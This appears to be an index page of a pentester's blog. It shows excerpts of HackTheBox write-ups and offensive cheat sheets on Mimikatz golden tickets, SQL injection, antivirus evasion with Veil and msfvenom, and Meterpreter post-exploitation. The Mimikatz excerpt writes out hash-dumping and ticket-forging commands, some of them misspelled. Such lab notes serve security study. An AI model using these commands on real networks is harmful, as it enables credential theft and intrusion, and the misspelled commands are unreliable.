Table of Contents Command History Set Up Recon Nmap Smbclient Gpp-decrypt Foothold GetUserSPNs.py JohnTheRipper Psexec.py Final Words What is Kerberos? How Does It Work? Mitigations References Command History Nmap – found ports open, pretty much confirmed that this is a AD DC – effective – valuable smbclient – found share folders – effective – valuable…
Author: 0pr
Mimikatz
Table of Contents Dump LSA Hashes Dump krbtgt Hash Golden Ticket Dump LSA Hashes lasdump::lsd /patch Dump krbtgt Hash lasdump::lsd /inject /name:krbtgt Golden Ticket kerberos::golden /User:<username> /domain:<domain> /sid:<user-sid> /krbtgt:<krbtgt-NTLM-hash> /id:500 /ptt # if successful misc::cmd # list other user's file dir \\<computer-name>\<driver>$
0x0F-HackTheBox-Control
Table of Contents Command History Set Up Recon Masscan Nmap Check out the Website Gobuster The Login Page Burp Suite SQL Injection Probe Sqlmap Side Notes: How Sqlmap Works Foothold MySQL Database WinPEAs Sqlmap Dump All Info Powershell Code Execution PHP File Solution Final Thoughts References Command History masscan – found several service ports -…
0x0E-HackTheBox-OpenAdmin
Table of Contents Command History Set Up Recon Masscan Check Out Website Gobuster Manual Explore Foothold Manual Enumeration MySQL Linenum LinPEAs Go Back and Review SSH Brute Force JohnTheRipper Final Thoughts References Command History masscan – found open port 22, 80 – effective nmap – scan for services – effective gobuster – found three hidden…
Tricks
Table of Contents General Linux Metasploit Port Forwarding Sed Less SSH SSH Tunnel Bash NetCat Nmap Wget PHP File Upload Script and Web Server Tcpdump Windows Burp Suite General Put GIF8; on top of payload to make it a GIT image file type. Linux Metasploit Import xml to database. nmap -Pn -sS -A -oX Subnet1…
Databases
Table of Contents MySQL Enumeration Manual SQL Injection Sqlmap Foothold Sqlmap Mysqldump MSSQL Enumeration Mssql_ping Mssql_enum Mssql_enum_logins Mssql_schemadump Brute Forcing Mssql_login Jtr_mssql_fast Foothold Mssqlclient.py Mssql_payload Lateral Movement Mssql_hashdump XP_cmdshell Privilege Escalation Mssql_escalate_dbowner Mssql_escalate_execute_as MySQL Enumeration Manual SQL Injection If some search field is vulnerable to injection. Use below techniques # in burp suite check the…
Active Directory 101 – LDAP
Basicly speaking, LDAP is a network protocol that can be used to talk to Active Directory. In Windows Servers, LDAP can be integrated as a feature along side AD, to add authentication/authorization scalability to the entire system. It’s so big a topic, I won’t write about it. Here are some good references to read about…
0x0D-HackTheBox-Cascade
Table of Contents Command History Set Up Recon Masscan Nmap Rpcclient Smbclient Enum4linux Nmap Read More Ldapsearch Sambe on 139,445 Rpc DNS on 53 Kerberos on 88 Evil-winrm Foothold Privilege Escalation Manual Enumeration PowerView.ps1 Go Back to Check the Command List Crack the LDAP Encoded Thing Evil-winrm Some Assessment Final Thoughts References Command History Reference…
Avoiding Detection
Table of Contents Msfvenom Packer Veil References Msfvenom Link to Msfvenom. Use with multiple encoders to evade detection. Packer Install upx to pack the executable. Here is a link to PolyPack Project which talks about packing in more detail. Veil For MeterHTTPSContained payload ./Veil.py use 20 set LHOST <ip> set LPORT <port> generate use the…
Meterpreter
Table of Contents Extracting the Password Hashes Pass the Hash Capturing Key Strokes Token Impersonation Pivoting Through Sub-network Meterpreter Scripts Migrating to a Process Killing Antivirus Software Obtaining System Password Hashes Viewing All Traffic on a Target Machine Scraping a System Using Persistence Leveraging Post Exploitation Modules Upgrading Your Command Shell to Meterpreter Manipulating Windows…